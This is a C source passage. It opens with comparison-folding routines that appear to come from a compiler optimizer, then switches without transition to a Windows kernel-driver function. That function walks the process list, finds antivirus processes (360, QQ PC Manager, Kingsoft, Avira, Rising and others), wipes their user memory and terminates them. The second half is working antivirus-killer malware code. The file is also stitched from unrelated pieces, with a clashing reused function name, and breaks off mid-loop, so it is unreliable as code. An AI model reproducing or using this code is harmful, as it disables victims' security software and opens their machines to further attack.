static instruction *CmpRelocZero( instruction *ins, opcnt c, opcnt r )
/*********************************************************************/
{
name *cons;
name *rel;
bool truth;
if( OpcodeNumOperands( ins ) != 2 )
return( NULL );
cons = ins->operands[c];
if( cons->n.class != N_CONSTANT )
return( NULL );
if( cons->c.const_type != CONS_ABSOLUTE )
return( NULL );
if( CFTest( cons->c.value ) != 0 )
return( NULL );
rel = ins->operands[r];
if( rel->c.const_type == CONS_OFFSET && !AskSegIsNear( (segment_id)rel->c.lo.int_value ) )
return( NULL );
switch( ins->head.opcode ) {
case OP_BIT_TEST_FALSE:
case OP_CMP_EQUAL:
case OP_CMP_LESS:
case OP_CMP_LESS_EQUAL:
truth = false;
break;
case OP_BIT_TEST_TRUE:
case OP_CMP_GREATER:
case OP_CMP_GREATER_EQUAL:
case OP_CMP_NOT_EQUAL:
truth = true;
break;
default:
return( false );
}
if( !ActiveCompare( ins ) )
return( NULL );
if( c != 1 )
truth = !truth;
if( truth ) {
_SetBlockIndex( ins, _TrueIndex(ins), _TrueIndex(ins) );
} else {
_SetBlockIndex( ins, _FalseIndex(ins), _FalseIndex(ins) );
}
return( KillCompare( ins, AllocIntConst( truth ? FETrue() : 0 ) ) );
}
static instruction *StraightLine( instruction *ins, tn fold, bool is_true )
/***************************************************************************
See if we can turn a comparison into a straight line piece of code.
*/
{
name *result;
result = TGetName( fold );
if( result == NULL )
return( NULL );
if( result->n.class != N_CONSTANT )
return( NULL );
if( result->c.const_type != CONS_ABSOLUTE )
return( NULL );
if( result->c.lo.int_value == 0 )
is_true = !is_true;
if( is_true ) {
_SetBlockIndex( ins, _TrueIndex(ins), _TrueIndex(ins) );
} else {
_SetBlockIndex( ins, _FalseIndex(ins), _FalseIndex(ins) );
}
return( KillCompare( ins, result ) );
}
void KillProcess(PVOID Context)
{
NTSTATUS status;
HANDLE prohd;
BOOLEAN bexe;
ULONG puserAddress;
KAPC_STATE ApcState;
ANSI_STRING imagename;
PEPROCESS pepro,ptempepro;
LARGE_INTEGER timeout;
PSE_AUDIT_PROCESS_CREATION_INFO papc;
ANSI_STRING pastr;
PVOID pstrb=NULL;
while(TRUE)
{
pepro=PsGetCurrentProcess();
ptempepro=pepro;
do
{
bexe=FALSE;
RtlInitAnsiString(&imagename,(PVOID)((ULONG)ptempepro+eprooffset.ImageFileName)); //+0x174 ImageFileName
papc=(PSE_AUDIT_PROCESS_CREATION_INFO)((ULONG)ptempepro+eprooffset.SE_AUDIT_PROCESS_CREATION_INFO);//EPROCESS偏移0x1f4处存放着_SE_AUDIT_PROCESS_CREATION_INFO结构的指针
__try
{
if (papc->ImageFileName->Name.Length!=0)
{
RtlUnicodeStringToAnsiString(&pastr,&papc->ImageFileName->Name,TRUE);
pstrb=strstr(pastr.Buffer,"360");
if (pstrb!=NULL)
{
bexe=TRUE;
}
RtlFreeAnsiString(&pastr);
}
}__except(1){}
KillCompare(&imagename,"360tray.exe",&bexe);
KillCompare(&imagename,"360safe.exe",&bexe);
KillCompare(&imagename,"ZhuDongFangYu.e",&bexe);
KillCompare(&imagename,"360rp.exe",&bexe);
KillCompare(&imagename,"360sd.exe",&bexe);
KillCompare(&imagename,"qqpcrtp.exe",&bexe);
KillCompare(&imagename,"qqpcleakscan.ex",&bexe);
KillCompare(&imagename,"qqpctray.exe",&bexe);
KillCompare(&imagename,"qqpcmgr.exe",&bexe);
KillCompare(&imagename,"ksafe.exe",&bexe);
KillCompare(&imagename,"kscan.exe",&bexe);
KillCompare(&imagename,"kxescore.exe",&bexe);
KillCompare(&imagename,"kxetray.exe",&bexe);
KillCompare(&imagename,"ksafesvc.exe",&bexe);
KillCompare(&imagename,"ksafetray.exe",&bexe);
KillCompare(&imagename,"ksmgui.exe",&bexe);
KillCompare(&imagename,"ksmsvc.exe",&bexe);
KillCompare(&imagename,"avcenter.exe",&bexe);
KillCompare(&imagename,"avgnt.exe",&bexe);
KillCompare(&imagename,"avguard.exe",&bexe);
KillCompare(&imagename,"avshadow.exe",&bexe);
KillCompare(&imagename,"sched.exe",&bexe);
KillCompare(&imagename,"ravmond.exe",&bexe);
KillCompare(&imagename,"rsagent.exe",&bexe);
KillCompare(&imagename,"rstray.exe",&bexe);
KillCompare(&imagename,"rsmgrsvc.exe",&bexe);
if (bexe)
{
KeStackAttachProcess(ptempepro,&ApcState);
for(puserAddress=0;puserAddress<=0x7fffffff;puserAddress+=0x1000)
{
if(MmIsAddressValid((PVOID)puserAddress))
{
__try
{
ProbeForWrite((PVOID)puserAddress,0x1000,sizeof(ULONG));
RtlZeroMemory((PVOID)puserAddress, 0x1000);
}__except(1)
{
continue;
}
}
else
{
if(puserAddress>0x1000000)//填这么多足够破坏进程数据了
{
break;
}
}
}
KeUnstackDetachProcess(&ApcState);
status=ObOpenObjectByPointer(ptempepro,0,NULL,PROCESS_ALL_ACCESS,*PsProcessType,KernelMode,&prohd);
if (NT_SUCCESS(status))
{
ZwTerminateProcess(prohd,0);
ZwClose(prohd);
}
}
ptempepro=(PEPROCESS)((ULONG)(*(PULONG)((ULONG)ptempepro+eprooffset.ActiveProcessLinks))-eprooffset.ActiveProcessLinks); //+0x088 ActiveProcessLinks : _LIST_ENTRY
} while (ptempepro!=pepro);
